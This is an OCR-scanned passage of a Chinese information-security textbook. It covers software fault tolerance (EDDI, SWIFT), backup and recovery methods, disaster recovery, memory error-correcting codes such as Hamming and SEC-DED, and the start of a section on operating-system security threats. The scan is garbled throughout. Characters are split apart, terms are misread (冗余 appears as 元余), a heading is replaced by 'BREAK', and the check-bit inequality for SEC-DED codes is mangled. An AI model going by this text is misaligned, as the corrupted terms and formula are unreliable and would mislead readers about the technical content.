(4) 带 抽 象 规 格 封装 的 拜占庭 容错 (Byzantine fault tolerance with Abstract 
Specification Encapsulation， 简 称 BASE): BASE 使 用 抽象 提取 技术 来 减少 拜占庭 容错 
(BFT) 的 开销 ， 从 而 提高 其 容错 能 力 。 

(5) 复制 指令 错误 探测 (Error Detection by Duplicate Instructions， 简 称 EDDI): 是 
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一 种 编译 器 级 容错 技术 。 它 的 基本 思想 是 : 编译 器 复制 程序 指令 并 将 源 指令 与 复制 指令 
合并 (为 了 提高 容错 性 能 ， 两 种 指令 放 在 不 同 的 寄存 器 和 内 存 的 不 同位 置 )。 在 一 定 的 同 
步 点 (store 指令 处 和 branc 指令 处 ), 编译 器 插入 检测 指令 来 检查 源 指令 与 复制 指令 的 执 
行 结 果 是 否 一 致 。 其 优点 是 效率 高 ， 既 可 用 于 单机 环境 ， 又 可 用 于 分 布 式 环境 ， 而 且 可 
以 根据 不 同 环境 加 以 定制 。 

(6) SWIFT (Soft Ware Implemented Fault Tolerance 简称 SWIFT): 是 在 EDDI 基础 
上 改进 的 编译 器 级 容错 技术 ， 它 的 基本 思想 是 与 EDDI 一 致 的 。 

从 上 面 的 比较 可 以 看 出 ， 随 着 软件 容错 技术 的 日 趋 成 熟 ， 首 先 ， 宛 余 的 方式 越 来 越 
复杂 ， 不 再 是 简单 备份 ， 而 是 进一步 考虑 更 加 “智能 化 ”的 元 余 ， 于 是 元 余 规模 越 来 越 
小 。 并 且 ， 虽 然 元 余 程 度 不 断 降低 ， 系 统 可 靠 性 却 在 不 断 提高 。 当 然 ， 可 靠 性 与 元 余 造 
成 的 额外 开销 是 一 对 矛盾 ， 要 根据 具体 应 用 的 实际 背景 在 二 者 之 间作 一 些 权衡 ， 在 合理 
提高 系统 可 靠 性 的 同时 尽量 减少 额外 开销 是 软件 容错 技术 不 断 努 力 的 目标 。 其 次 ， 软 件 
元 余 的 实现 级 别 越 来 越 靠 近 底层 。 粗 略 来 说 ， 软 件 容错 大 致 有 应 用 级 、 系 统 级 和 编译 器 
级 三 个 级 别 。 现 有 的 大 部 分 容错 技术 都 是 应 用 级 的 ， 最 近 也 出 现 了 系统 级 和 编译 器 级 容 
错 。 从 错误 扩散 角度 上 看 ， 容 错 的 实现 级 别 越 高 ， 容 错 本 身 应 该 越 复杂 ， 但 事实 远 非 如 
此 。 在 更 底层 实现 容错 技术 意味 着 自 底 向 上 都 要 提供 容错 支持 ， 其 实现 远 比 在 上 层 针对 
具体 应 用 进行 容错 要 复杂 得 多 ， 同 时 在 大 部 分 情况 下 也 有 效 得 多 。 最 后 ， 容 错 的 执行 方 
式 越 来 越 多 样 化 ， 并 不 要 求 必 须 串 行 执行 或 并 行 执行 。 并 行 执行 的 好 处 是 效率 高 ， 但 需 
要 一 定 的 同步 机 制 且 系 统 的 功 耗 较 大 ， 而 串 行 执行 则 实现 简单 ， 但 在 最 后 决策 做 出 之 前 
需要 暂 存 所 有 结果 且 整 个 程序 的 执行 效率 较 低 ,新 的 软件 容错 技术 大 都 既 可 以 并 行 执 行 ， 
又 可 以 串 行 执行 。 这 样 ， 在 实现 层面 ， 用 户 就 可 以 根据 自己 的 需要 灵活 选择 容错 的 执行 
方式 s 
4.15.4 ”数据 容错 

数据 容错 的 策略 就 是 数据 备份 和 恢复 策略 ， 以 及 容 灾 技术 、 数 据 纠 错 等 技术 。 

数据 备份 指 的 是 将 计算 机 系统 中 硬 磁盘 上 的 一 部 分 数据 转 到 可 脱 机 保存 的 介质 (如 
磁带 、 软 磁盘 和 光盘 ) 上 。 通 常 可 以 分 为 完全 备份 、 增 量 备份 、 差 分 备份 和 渐进 式 备 份 
等 多 种 备份 方式 。 

1. 完全 备份 

完全 备份 (FullBackup) 是 指 将 系统 中 所 有 选择 的 数据 对 象 进行 一 次 全 面 的 备份 ， 
而 不 论 数据 对 象 自 上 次 备份 之 后 是 否 修 改过 。 这 是 最 基本 也 是 最 简单 的 备份 方式 。 它 是 
所 有 更 进一步 、 更 灵活 的 备份 方式 的 基础 。 

对 文件 系统 而 言 ， 完 全 备份 是 对 用 户 指定 的 所 有 文件 进行 一 次 全 面 的 备份 。 它 备份 
全 部 选中 的 文件 及 文件 夹 ， 并 不 依赖 文件 的 存档 属性 来 确定 备份 哪些 文件 。 

对 数据 库 系 统 而 言 ， 完 全 备份 是 对 一 个 或 多 个 数据 文件 中 使 用 过 的 数据 块 的 备份 。 
没有 使 用 过 的 数据 块 是 不 被 备份 的 。 它 不 同 于 对 所 有 必要 的 数据 库 元 素 〈 配 置 文件 、 数 
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据 文 件 、 控 制 文件 、 重 做 日 志和 归档 日 志 ) 的 文件 级 拷贝 。 

对 于 邮件 服务 器 而 言 ， 完 全 备份 是 对 选择 好 的 数据 库 和 相关 日 志 备份 ， 完 成 以 后 ， 
它 会 删除 日 志 ， 释 放 磁 盘 空间 。 

完全 备份 的 优点 具有 非常 简单 的 操作 过 程 。 如 果 在 备份 间隔 期 间 出 现 数据 丢失 等 问 
题 ， 可 以 只 使 用 一 份 备份 快速 地 恢复 所 丢失 的 数据 。 完 全 备份 的 缺点 是 备份 的 数据 量 最 
大 ， 备 份 时 间 最 长 ， 所 需要 的 存储 容量 是 最 大 ， 对 服务 器 的 正常 运营 也 是 影响 最 大 。 

2. 增 量 备份 

增 量 备份 是 指 只 对 上 次 备份 后 系统 中 变化 过 的 数据 对 象 的 备份 。 也 称 为 非 累 积 增 量 
备份 。 这 种 方式 是 针对 特定 的 时 间 段 内 新 创建 、 更 新 及 删除 的 数据 对 象 。 

对 文件 系统 而 言 ， 增 量 备 份 会 检查 自 上 次 备份 后 ， 文 件 有 没有 被 更 动 过 ， 根 据 文件 
的 存档 属性 来 确定 备份 哪些 文件 。 对 NTFS 文件 还 有 安全 性 描述 符 ， 即 所 有 者 安全 性 标 
识 SID、 组 SID、 自 选 访问 控制 表 (ACL) 和 系统 ACL。 对 UNIX 文件 还 有 UNIXowner 
和 UNIXgroup 等 。 增 量 备 份 完 成 以 后 ， 会 对 于 选中 的 文件 和 文件 夹 标 为 已 备份 ， 清 除 存 
档 属 性 。 

对 数据 库 系 统 而 言 ， 增 量 备份 是 指 备份 一 个 或 多 个 数据 文件 的 自从 上 一 次 同一 级 别 
的 或 更 低级 别 的 备份 以 来 被 修改 过 的 数据 块 。 

对 于 邮件 服务 器 而 言 ， 增 量 备份 是 将 数据 库 相 关联 的 日 志 备份 存储 下 来 ， 然 后 删除 
磁盘 上 的 源 日 志 。 这 种 备份 方式 对 邮件 服务 器 的 影响 是 最 低 的。 

增 量 备份 的 优点 是 备份 时 间 比 完全 备份 短 许 多 。 它 没有 重复 的 备份 数据 ， 减 少 了 网 
络 带 宽 占用 ， 节 省 了 存储 空间 ， 缩 短 了 备份 的 时 间 。 因 而 这 种 备份 方法 比较 经 济 ， 可 以 
频繁 地 进行 。 

增 量 备份 的 缺点 是 数据 恢复 时 间 长 ， 恢 复工 作 比较 麻烦 。 传 统 的 备份 策略 是 在 偶尔 
进行 完全 备份 后 ， 频 繁 地 进行 增 量 备份 。 因 此 恢复 操作 要 做 很 多 工作 。 如 果 要 恢复 一 个 
文件 ， 必 须 把 所 有 增 量 备份 的 磁带 都 找 过 一 遍 ， 直 到 找到 为 止 。 如 果 要 恢复 整个 系统 ， 
那 就 得 先 恢复 最 近 一 次 的 完全 备份 ， 要 顺序 地 进行 从 上 次 完全 备份 以 来 的 每 一 次 增 量 
份 的 恢复 。 

3. 差分 备份 。 

差分 备份 是 指 对 上 次 完全 备份 以 来 系统 中 所 有 变化 过 的 数据 对 象 的 备份 ， 也 称 为 累 
积 (cumulative) 增 量 备份 。 这 种 备份 在 进行 备份 和 数据 恢复 的 时 候 耗 时 适中 。 对 文件 系 
统 而 言 ， 差 分 备份 会 检查 自 上 次 完全 备份 后 ， 文 件 有 没有 被 更 改过 根据 文件 的 存档 属性 
来 确定 备份 哪些 文件 。 备 份 完成 以 后 ， 不 会 对 于 选中 的 文件 和 文件 夹 标 为 已 备份 ， 仍 然 
保留 存档 属性 。 

对 数据 库 系 统 而 言 ， 差 分 备份 包括 自 最 后 一 次 在 更 低级 别 进行 备份 以 来 所 有 改动 过 
的 数据 块 。 对 于 邮件 服务 器 而 言 ， 差 分 备份 是 将 数据 库 相 关联 的 日 志 备 份 存储 下 来 ， 但 
是 不 会 在 备份 完成 之 后 删除 。 差 分 备份 的 优点 是 数据 恢复 简单 快捷 。 它 将 恢复 时 涉及 到 
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的 备份 记录 数量 限制 在 2 个 ， 简 化 了 恢复 的 复杂 性 。 只 需要 最 近 一 次 的 全 量 备份 数据 以 
及 最 近 一 次 的 累积 增 量 备份 数据 。 与 完全 备份 相 比 ， 差 分 备份 的 工作 量 小 ,备份 时 间 短 ， 
并 节省 磁盘 空间 。 与 增 量 备份 相 比 , 差分 备份 的 工作 量 大 , 随 着 时 间 推 移 而 不 断 增加 ( 假 
设 每 天 修改 的 数据 都 不 一 样 )。 但 是 它 的 灾难 恢复 相对 简单 。 因为 要 查找 和 恢复 的 备份 记 
录 数 目 比 较 少 ， 所 以 恢复 一 个 文件 或 整个 系统 的 速度 都 比较 快 。 

4. 渐进 式 备份 

渐进 式 备 份 也 称 为 “只 有 增 量 备 份 ” 或 “连续 增 量 备份 ” 它 是 指 系统 排除 完全 备 
份 ， 数 据 对 象 只 有 当 发 生 改变 时 才 被 写 入 到 存储 介质 上 。 一 些 专业 备份 软件 借用 数据 管 
理 特性 实现 了 这 种 备份 方式 。 它 一 般 应 用 文件 系统 的 备份 。 

渐进 式 备份 只 在 初始 时 做 所 有 数据 文件 的 全 部 备份 ， 以 后 只 备份 新 建 或 改动 过 的 文 
件 ， 比 上 述 三 种 备份 方式 有 更 少 的 数据 移动 。 这 种 方式 减少 了 备份 时 间 和 所 需 的 存储 容 
量 ， 减 轻 了 网 络 负担 。 同 时 数据 恢复 通过 数据 库 参 与 来 进行 ， 具 有 更 好 的 恢复 性 能 。 此 
外 ， 这 种 备份 方式 可 以 降低 潜在 的 人 为 错误 ， 并 帮助 提高 存储 管理 效率 。 

5. 数据 恢 复 

恢复 措施 在 整个 备份 制度 中 占有 相当 重要 的 地 位 ， 因 为 它 关 系 到 系统 在 经 历 灾难 后 
能 否 迅 速 恢 复 。 恢 复 操作 通常 可 以 分 为 以 下 儿 种 :全盘 恢复 、 数 据 库 和 邮件 系统 恢复 、 
个 别 文件 恢复 和 重 定向 恢复 。 

全 盘 恢 复 : 一 般 应 用 在 服务 器 发 生意 外 灾难 导致 数据 全 部 丢失 、 系 统 崩 省 或 有 计划 
的 系统 升级 、 系 统 重组 等 ， 也 称 为 系统 恢复 。 

数据 库 和 邮件 系统 恢复 : 此 项 恢复 对 管理 人 员 的 要 求 较 高 ， 在 利用 备份 软件 进行 恢 
复 后 ， 通 常 还 需要 进行 一 些 后 续 的 维护 工作 。 因 此 要 求 管理 人 员 应 熟悉 所 管理 的 数据 库 
和 邮件 系统 自身 的 备份 和 恢复 机 制 。 

个 别 文件 恢复 : 由 于 操作 人 员 的 水 平 不 高 ， 个 别 文件 恢复 可 能 要 比 全 盘 恢 复 常见 得 

多 ， 利 用 网 络 备份 系统 的 恢复 功能 ， 我 们 很 容易 恢复 受 损 的 个 别 文件 。 只 需 浏览 备份 数 
据 库 或 目录 ， 找 到 该 文件 触动 恢复 功能 ， 软 件 将 自动 驱动 存储 设备 ， 加 载 相应 的 存储 煤 
体 ， 然 后 恢复 指定 文件 。 
重 定向 恢复 : 将 备份 的 文件 恢复 到 另 一 个 不 同 的 位 置 或 系统 上 去 ， 而 不 是 操作 到 它 
们 当时 所 在 的 位 置 。 重 定向 恢复 可 以 是 整个 系统 恢复 ， 也 可 以 是 个 别 文件 恢复 ， 某 些 数 
据 库 和 邮件 系统 也 支持 重 定向 恢复 ， 重 定向 恢复 时 需要 慎重 考虑 ， 要 确保 系统 或 文件 恢 
复 后 的 可 用 性 。 

6. BREAK 

容 灾 技 术 的 主要 目的 是 在 灾难 发 生 时 保证 计算 机 系统 能 继续 对 外 提供 服务 。 计 算 机 
硬件 故障 、 停 电 、 大 楼 火灾 、 大 范围 地 震 、 战 争 等 都 属于 灾难 的 范畴 。 根 据 保 护 对 象 的 
不 同 ， 容 灾 可 以 分 为 数据 容 灾 和 应 用 容 灾 两 类 。 

数据 容 灾 是 在 异地 建立 一 个 数据 容 灾 系 统 ， 该 系统 实时 复制 本 地 应 用 服务 产生 的 数 
据 ， 当 本 地 数据 因为 灾难 而 无 法 存 取 时 ， 应 用 服务 可 以 通过 异地 数据 容 灾 中 心 来 继续 数 
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据 的 存 取 ， 在 实际 应 用 中 ， 由 于 传输 路 径 的 延 时 等 原因 ， 异 地 数据 容 灾 中 心 所 保存 的 数 
据 一 般 比 本 地 数据 稍微 滞后 ， 但 是 数据 应 该 是 一 致 的 ， 可 用 的 。 

应 用 容 灾 是 建立 在 数据 容 灾 的 基础 之 上 ， 在 异地 容 灾 中 心 建立 和 本 地 应 用 服务 系统 
相当 的 应 用 系统 ， 当 本 地 发 生 灾难 时 ,异地 容 灾 系 统 检 测 到 灾难 的 发 生 ， 进 行 应 用 切换 ， 
由 异地 容 灾 系统 向 外 提供 服务 。 

应 用 容 灾 是 完整 的 容 灾 解 决 方案 ， 实 现 了 应 用 级 的 远程 容 灾 ， 真 正 实现 了 系统 和 数 
据 的 高 可 用 性 。 数 据 容 灾 是 应 用 容 灾 的 基础 ， 而 数据 容 灾 中 最 关键 的 技术 是 远程 数据 
复制 。 

数据 远程 复制 主要 分 为 同步 数据 复制 和 异步 数据 复制 。 

同步 数据 复制 是 将 本 地 的 生产 数据 以 完全 同步 的 方式 复制 到 异地 ， 每 次 对 本 地 存储 
设备 进行 数据 的 同时 ， 也 对 远程 数据 中 心 存储 设备 进行 相同 的 操作 ， 只 有 当 本 地 和 远程 
数据 中 心 都 完成 操作 时 ， 才 进行 下 一 个 操作 。 由 于 本 地 和 异地 之 间 较 远 的 距离 传输 链 路 
的 时 延 、 带 宽 等 因素 的 限制 ， 同 步 复 制 会 严重 影响 本 地 应 用 的 性 能 。 

异步 复制 是 将 本 地 生产 数据 以 后 台 异 步 的 方式 复制 到 异地 ， 应 用 对 本 地 的 操作 正常 
进行 ， 无 须 关心 该 操作 传播 至 远程 数据 中 心 的 情况 。 只 需 在 本 地 数据 至 传输 路 径 上 的 某 
一 处 ， 由 一 个 后 台 实 体 将 本 地 的 操作 复制 到 异地 数据 中 。 

7. 容 灾 与 备份 的 区 别 

数据 备份 和 数据 容 灾 的 目的 都 是 为 了 提高 数据 的 可 用 性 ， 消 除 或 者 降低 灾难 引起 的 
数据 丢失 ， 并 且 在 灾难 过 后 将 数据 恢复 到 正确 的 状态 ， 但 是 二 者 存在 本 质 的 区 别 。 备 份 
数据 从 迎 辑 上 来 讲 是 离线 的 ， 在 物理 上 数据 是 离线 备份 在 磁带 或 者 光盘 上 的 ， 数 据 备 份 
是 将 数据 从 在 线 状 态 剥 离 到 离线 状态 的 过 程 。 随 着 磁盘 备份 技术 的 发 展 ， 越 来 越 多 的 数 
据 备 份 到 了 磁盘 上 ， 虽 然 备份 磁盘 往往 是 在 线 的 或 者 是 近 线 的 ， 但 是 在 逻辑 上 备份 数据 
和 应 用 数据 属于 不 同 的 空间 ， 从 备份 数据 到 应 用 数据 的 转换 一 般 需 要 一 个 特定 的 恢复 过 
程 。 因 此 数据 备份 是 将 某 个 特定 时 间 点 的 完整 、 统 一 的 数据 或 状态 保存 下 来 ， 并 不 能 够 
保证 数据 的 实时 性 ， 一 旦 灾难 发 生 ， 数 据 备份 只 能 保证 在 一 定时 间 内 将 数据 恢复 到 某 个 
时 间 点 上 的 完整 正确 的 状态 。 

在 恢复 过 程 中 ， 数 据 是 不 可 用 的 ， 恢 复 完成 后 ， 数 据 也 不 能 恢复 到 灾难 发 生 时 的 正 
确 状态 ， 而 只 能 是 灾难 之 前 一 段 时 间 的 正确 状态 ， 而 数据 容 灾 的 关键 在 于 保护 数据 的 在 
线 状态 ， 保 证 数据 在 发 生 灾难 时 能 从 容 灾 中 心 及 时 恢复 并 且 无 颖 地 向 外 提供 数据 服务 ， 
实时 地 保护 数据 ， 数 据 容 灾 能 够 实现 更 高 的 数据 可 用 性 ， 因 而 成 为 近年 来 的 研究 热点 。 

8. 数据 纠 错 技术 

存储 器 是 计算 机 系统 中 常用 的 器 件 之 一 ， 存 储 器 自身 也 因为 种 种 原因 会 发 生存 储 数 
据 的 失效 。 实 际 统计 表明 ， 存 储 器 的 主要 错误 是 单个 电路 故障 所 引起 的 一 位 错 或 者 相关 
多 位 错 ， 而 随机 独立 的 多 位 错误 极 少 。 在 按 字 节 组 织 的 内 存储 器 中 ， 主 要 错误 模式 为 单 
字 节 错 ;而 在 按 位 组 织 的 内 存储 器 中 ， 主 要 错误 模式 为 单位 错 。 

半导体 存储 器 的 错误 大 体 上 分 为 硬 错误 和 软 错误 ， 其 中 主要 为 软 错误 。 硬 错误 所 表 
现 的 现象 是 在 某 个 或 某 些 位 置 上 ， 存 取 数 据 重复 地 出 现 错误 ， 出 现 这 种 现象 的 原因 是 一 
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个 或 几 个 存储 单元 出 现 故 障 。 软 错误 主要 是 由 粒子 引起 的 ， 存 储 器 芯片 的 材料 中 含有 
微量 放射 性 元 素 ， 它 们 会 间断 地 释放 a 粒子 。 这 些 粒子 以 相当 大 的 能 量 冲击 存储 电容 ， 
改变 其 电荷 ， 从 而 引起 存储 数据 的 错误 。 引 起 软 错误 的 另 一 原因 是 噪声 干扰 。 

随 着 存储 芯片 容量 的 增 大 ， 器 件 的 成 品 率 呈 指数 规律 下 降 。 通 常人 们 一 方面 改良 制 
造 工 艺 以 提高 成 品 率 ; 另 一 方面 在 电路 设计 时 通过 硬件 元 余 的 方式 来 实现 提高 可 靠 性 。 
当前 ，VLSI 存储 器 芯片 的 设计 过 程 中 主要 采用 两 种 错误 检测 与 纠正 方案 。 

O 备份 行 (或 列 ) FR: 这 种 方案 是 在 存储 芯片 的 设计 与 制造 过 程 中 ， 增 加 若干 
备份 的 行 ( 或 列 )。 在 芯片 测试 时 ， 若 发 现 失效 的 行 ( 或 列 )， 则 通过 激光 (或 电学 ) 的 
处 理 ， 用 备份 行 ( 或 列 ) 去 代替 它们 。 这 种 方法 的 优点 是 设计 简单 ， 管 芯 面积 增加 较 少 ， 
电路 速度 没有 损失 。 但 是 ， 它 需要 增加 某 些 测试 与 修正 失效 行 〈 或 列 ) 的 工艺 环节 ， 更 
重要 的 弱点 是 这 种 方案 仅 适 用 于 RAM， 不 能 用 于 ROM 等 存储 器 。 

@ 纠 错 编码 方案 : 这 种 方案 是 在 存储 芯片 内 部 采用 纠 错 编码 ， 自 动 检测 并 纠正 错 
误 。 这 种 方案 不 需要 额外 的 测试 和 纠正 错误 等 工艺 环节 ， 除 提高 成 品 率 外 ， 还 对 可 靠 性 
有 明显 改进 。 这 种 方案 最 突出 的 优点 是 特别 适合 ROM， 在 对 速度 要 求 不 高 的 情况 下 也 
可 用 于 RAM。 其 主要 缺点 在 于 要 占用 额外 的 芯片 面积 ， 同 时 因 编 译 码 而 影响 芯片 整个 
的 工作 速度 。 将 用 于 存储 器 系统 级 的 纠 错 编码 等 容错 技术 引入 存储 器 芯片 内 部 ， 是 提高 
存储 芯片 成 品 率 和 可 靠 性 的 有 效 措施 ， 例 如 ECC 内 存 就 采用 了 此 技术 。 

存储 技术 中 常用 的 纠 检 错 码 有 奇偶 校 验 码 、 海 明码 及 其 改进 码 。 

在 串 行 通信 中 使 用 的 一 维 奇偶 校 验 码 是 最 简单 的 一 种 纠 错 码 ， 它 的 编码 规律 是 在 数 
据 位 末尾 添加 一 位 校 验 位 ， 使 得 整个 码 字 中 含有 奇数 或 偶数 个 1。 它 能 发 现 所 有 的 奇数 
位 错 ， 但 它 不 能 用 来 纠正 错误 。 需 要 指出 的 是 采用 二 维 奇偶 校 验 码 〈 即 将 数据 按 和 矩阵 排 
列 ， 分 别 对 行 、 列 进行 一 维 奇偶 校 验 编码 ) 后 ， 不 仅 可 以 纠正 一 位 错 ， 还 能 检 出 某 些 突 
发 错误 ， 所 以 在 一 些 数据 传输 网 络 中 得 以 应 用 。 

海 明 码 是 一 种 能 纠 一 位 错 的 线性 分 组 码 ， 由 于 它 的 编译 码 简 单 ， 在 数据 通信 和 计算 
机 存储 系统 中 广泛 应 用 ， 如 在 蓝牙 技术 和 硬盘 阵列 中 。 它 的 最 小 码 距 为 3。 可 以 纠正 一 
位 错误 ， 但 对 于 两 位 错 不 能 检测 ， 还 可 能 会 造成 误 纠 。 尽 管 发 生 一 位 错 的 概率 相对 最 高 ， 
但 在 一 些 要 求 较 高 的 应 用 中 海 明 码 不 能 满足 要 求 。 

常用 的 能 检测 两 位 错 同 时 能 纠正 一 位 错 (简称 纠 一 检 二 ，SEC-DED) 的 纠 错 码 有 扩 
展 海 明 码 (Extended Hamming Code) 和 最 佳 奇 权 码 (Optimal Odd-Weight-Column Code)， 
它们 的 最 小 码 距 都 为 4， 两 者 有 相似 之 处 ， 比 如 元 余 度 一 样 ， 对 于 数据 位 数 k， 校 验 位 数 
[应 满足 2-1 >ktr, “4k=16 时 ,Ir 二 6， 数 据 位 长 增加 一 倍 ， 校 验 位 数 只 需 增加 一 位 ， 
编码 效率 较 高 。 另 外 从 来 源 上 讲 ， 两 者 分 别 是 海 明 码 的 扩展 码 和 截 短 码 ， 也 有 资料 称 最 
佳 奇 权 码 为 修正 海 明 码 (Modified Hamming Code). 

利用 纠 错 码 技术 ， 可 以 保证 计算 机 存储 设备 数据 安全 。 
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4.2 操作 系统 安全 


操作 系统 位 于 硬件 之 上 ， 其 他 软件 之 下 ， 是 计算 机 系统 最 基础 的 软件 ， 因 此 在 信息 
系统 的 安全 中 ， 操 作 系 统 的 安全 性 具有 至 关 重 要 的 基础 作用 ， 其 安全 职能 是 其 他 软件 安 
全 职能 的 根基 。 一 方面 它 直 接 为 用 户 数 据 提供 各 种 保护 机 制 ， 如 实现 用 户 数 据 之 间 的 隔 
离 ， 另 一 方面 为 应 用 程序 提供 可 靠 的 运行 环境 ， 保 证 应 用 程序 的 各 种 安全 机 制 正常 发 挥 
作用 ， 如 禁止 数据 管理 系统 之 外 的 应 用 程序 直接 操作 数据 库 文件 ， 以 防 数据 库 系 统 的 安 
全 保护 机 制 被 绕 过 。 网 络 环境 下 的 信息 安全 需要 操作 系统 提供 更 强 的 安全 机 制 。 

操作 系统 安全 是 计算 机 系统 软件 安全 的 必要 条 件 ， 若 没有 操作 系统 提供 的 基础 安全 
性 ， 信 息 系统 的 安全 性 是 没有 基础 的 。 缺 乏 这 个 安全 的 根基 ， 构 筑 在 其 上 的 应 用 系统 以 
及 安全 系统 ， 如 PKI、 加 密 解 密 技术 的 安全 性 是 得 不 到 根本 保障 的 ， 信 息 系统 的 安全 性 
就 不 可 能 达到 预定 的 目的 。 


4.2.1 操作 系统 安全 概述 


操作 系统 实质 是 一 个 资源 管理 系统 ， 管 理 计算 机 系统 的 各 种 资源 ， 用 户 通过 它 获 得 
对 资源 的 访问 权限 。 安 全 操作 系统 除了 要 实现 普通 操作 系统 的 功能 外 ， 还 要 保证 它 所 管 
理 资源 的 安全 性 ， 包 括 保密 性 〈Secrecy)、 完 整 性 〈Integrity) 和 可 用 性 (Availability) 
等 。 保 密 性 是 为 了 防止 信息 在 非 授权 情况 下 的 泄露 ， 完 整 性 是 为 了 保护 信息 不 被 非法 自 
改 或 破坏 ， 可 用 性 是 保证 用 户 可 以 使 用 信息 系统 。 

安全 操作 系统 (Secure Operating System) 是 指 对 所 管理 的 数据 与 资源 提供 适当 的 保 
护 级 ， 有 效 地 控制 硬件 与 软件 功能 的 操作 系统 。 安 全 操作 系统 在 开发 完成 后 ， 在 正式 投 
入 使 用 之 前 一 般 都 要 求 通过 相应 的 安全 性 评测 。 

安全 在 操作 系统 的 含义 是 在 操作 系统 的 工作 范围 内 ， 提 供 尽 可 能 强 的 访问 控制 和 审 
计 机 制 ， 在 用 户 / 应 用 程序 和 系统 硬件 /资源 之 间 进 行 符合 安全 政策 的 调度 ， 而 限制 非法 
的 访问 。 在 整个 软件 信息 系统 的 最 底层 进行 保护 。 按 照 有 关 信 息 系 统 安全 标准 的 定义 ， 
安全 操作 系统 至 少 要 有 这 样 的 特征 : 最 小 特权 原则 ， 即 每 个 特权 用 户 只 拥有 能 进行 他 的 
工作 的 权利 ; 有 访问 控制 表 的 自主 访问 控制 ， 强 制 访问 控制 ， 包 括 保 密 性 访问 控制 和 完 
整 性 访问 控制 ， 安 全 审计 和 审计 管理 ， 安 全 域 隔离 ， 可 信 通 路 等 。 

操作 系统 安全 (Operating System Security) 是 指 操作 系统 无 错误 配置 、 无 漏洞 、 无 
后 门 、 无 特洛伊 木马 等 ， 能 防止 非法 用 户 对 计算 机 资源 的 非法 存 取 ， 一 般 用 来 表达 对 操 
作 系 统 的 安全 需求 。 

操作 系统 的 安全 性 (Security of Operating System) 是 指 操作 系统 具有 或 应 具有 的 安 
全 功能 ， 比 如 存储 保护 、 运 行 保护 、 标 识 与 鉴别 、 安 全 审计 等 。 

安全 操作 系统 与 操作 系统 安全 的 含义 不 尽 相 同 ， 操 作 系 统 安 全 表达 的 是 对 操作 系统 
的 安全 需求 ， 而 安全 操作 系统 的 特色 则 是 其 安全 性 。 但 二 者 又 是 统一 的 和 密 不 可 分 的 ， 
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因为 它们 所 关注 的 都 是 操作 系统 的 安全 性 。 安 全 操作 系统 通常 与 一 定 的 安全 等 级 相对 应 ， 
例如 ， 美 国 国防 部 根据 《可 信 计 算 机 系统 安全 评价 准则 (TCSEC)》， 将 操作 系统 的 安 
全 性 分 为 4 类 7 个 安全 级 别 。 

操作 系统 安全 性 的 主要 目标 是 标识 系统 中 的 用 户 ， 对 用 户 身 份 进行 认证 ， 对 用 户 的 
操作 进行 控制 ， 防 止 恶意 用 户 对 计算 机 资源 进行 窃取 ， 自 改 ， 破 坏 等 非法 存 取 ， 防 止 
当 用 户 操作 不 当 而 危害 系统 安全 ， 从 而 既 保 证 系统 运行 的 安全 性 ， 又 保证 系统 自身 的 安 
全 性 。 有 具体 包括 如 下 几 个 方面 : 

身份 认证 机 制 : 实施 强 认 证 方法 ， 比 如 口令 、 数 字 证 书 等 ; 

访问 控制 机 制 : 实施 细 粒 度 的 用 户 访问 控制 ， 细 化 访问 权限 等 ; 

数据 保密 性 : 对 关键 信息 ， 数 据 要 严 加 保密 ; 

数据 完整 性 ;防止 数据 系统 被 恶意 代码 破坏 ， 对 关键 信息 进行 数字 签名 技术 保护 ; 

系统 的 可 用 性 : 操作 系统 要 加 强 应 对 攻击 的 能 力 ， 比 如 防 病毒 ， 防 缓冲 区 溢出 攻击 
等 

审计 : 审计 是 一 种 有 效 的 保护 措施 , 它 可 以 在 一 定 程度 上 阻止 对 计算 机 系统 的 威胁 ， 
并 对 系统 检测 ， 故 障 恢复 方面 发 挥 重 要 作用 。 


4.2.2 ”操作 系统 面临 的 安全 威胁 


所 谓 安全 威胁 ， 是 指 这 样 一 种 可 能 性 ， 即 对 于 一 定 的 输入 ， 经 过 系统 处 理 ， 产 生 了 
危害 系统 安全 的 输出 。 随 着 外 界 环境 复杂 程度 的 增加 和 与 外 界 交 互 程度 的 提高 ， 系 统 的 
安全 性 显得 越 来 越 重 要 ， 安 全 问题 也 就 日 益 突出 。 目 前 网 络 技术 的 飞速 发 展 和 信息 共享 
的 程度 的 不 断 增强 ， 使 得 越 来 越 多 的 系统 遭受 着 各 种 安全 威胁 。 这 些 威胁 大 多 是 通过 利 
用 操作 系统 和 应 用 服务 程序 的 弱点 或 缺陷 实现 的 。 

按照 形成 安全 威胁 的 途径 来 分 ， 安 全 威胁 可 以 分 为 如 下 6 类: 

(1) 不 合理 的 授权 机 制 。 为 完成 某 项 任务 ， 只 需 分 配给 用 户 必 要 的 权限 ， 称 为 最 小 
特权 原则 。 如 果 分 配 了 不 必要 的 过 多 的 权限 ， 这 些 额外 权限 可 能 被 用 来 进行 一 些 不 希望 
的 操作 ， 对 系统 造成 危害 ， 即 授权 机 制 便 违反 了 最 小 特权 原则 。 有 时 授权 机 制 还 要 符合 
责任 分 离 原则 ， 将 安全 相关 的 权限 分 散 到 数 个 用 户 ， 避 免 集 中 在 一 个 人 手中 ， 造 成 权力 
的 滥用 。 

(2) 不 恰当 的 代码 执行 。 如 在 C 语言 实现 的 系统 中 普遍 存在 的 缓冲 区 溢出 问题 ， 以 
及 移动 代码 的 安全 性 问题 等 。 

G) 不 恰当 的 主体 控制 。 如 对 动态 创建 ， 删 除 ， 挂 起 ， 恢 复 主 体 的 行为 控制 不 够 
恰当 。 

(4) 不 安全 的 进程 间 通 信 (IPC)。 进 程 间 通信 的 安全 对 于 基于 消息 传递 的 微 内 核 系 
统 十 分 重要 ， 因 为 微 内 核 系 统 中 很 多 系统 服务 都 是 以 进程 的 形式 提供 的 。 这 些 系 统 进程 
需要 处 理 大量 外 部 正当 的 或 恶意 的 请 求 。 对 于 共享 内 存 的 PC， 还 存在 数据 存储 的 安全 
问题 。 
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(5) 网 络 协议 的 安全 漏洞 。 在 目前 网 络 大 规模 普及 的 情况 下 ， 很 多 攻击 性 的 安全 威 
胁 都 是 通过 网 络 在 线 入 侵 造 成 的 。 

(6) 服务 的 不 当 配 置 。 对 于 一 个 已 经 实现 的 安全 操作 系统 来 说 ， 多 大 程度 上 能 够 发 
挥 其 安全 设施 的 作用 ， 还 取决 于 系统 的 安全 配置 。 

按照 威胁 的 行为 方式 划分 ， 通 常 有 下 面 的 4 种 : 

CL) 切断 : 系统 的 资源 被 破坏 或 变 得 不 可 用 或 不 能 用 。 这 是 对 可 用 性 的 威胁 ， 如 破 
坏 硬盘 、 切 断 通信 线路 或 使 文件 管理 失效 。 

